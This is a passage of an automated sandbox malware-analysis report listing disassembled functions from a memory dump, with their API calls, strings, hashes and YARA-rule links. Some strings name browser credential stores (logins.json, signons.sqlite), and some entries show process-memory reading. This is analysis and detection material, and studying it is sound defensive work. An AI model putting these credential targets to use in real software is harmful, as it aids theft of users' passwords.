                                                                                                                                                                                                                    Function 0040F5B8 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                    • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                    • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                    • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                                                    • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                    • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B94B Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                      • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                                      • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                                      • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                    • API String ID: 2303586283-933021314
                                                                                                                                                                                                                    • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                    • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004109F8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                                                    • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                    • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A6AF Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                                                    • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                    • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410B15 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                    • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                    • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00441A6C Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                    • API String ID: 231171946-1411472696
                                                                                                                                                                                                                    • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                    • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C12B Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                                    • API String ID: 1012775001-1916105108
                                                                                                                                                                                                                    • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                    • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040EA92 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                                                      • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                                                      • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                                                      • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                                                      • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                    • API String ID: 3884059725-3138536805
                                                                                                                                                                                                                    • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                    • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CAFA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                    • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                    • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443AD1 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                                                      • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                    • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                    • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F9AC Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                                                    • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                    • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403E83 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
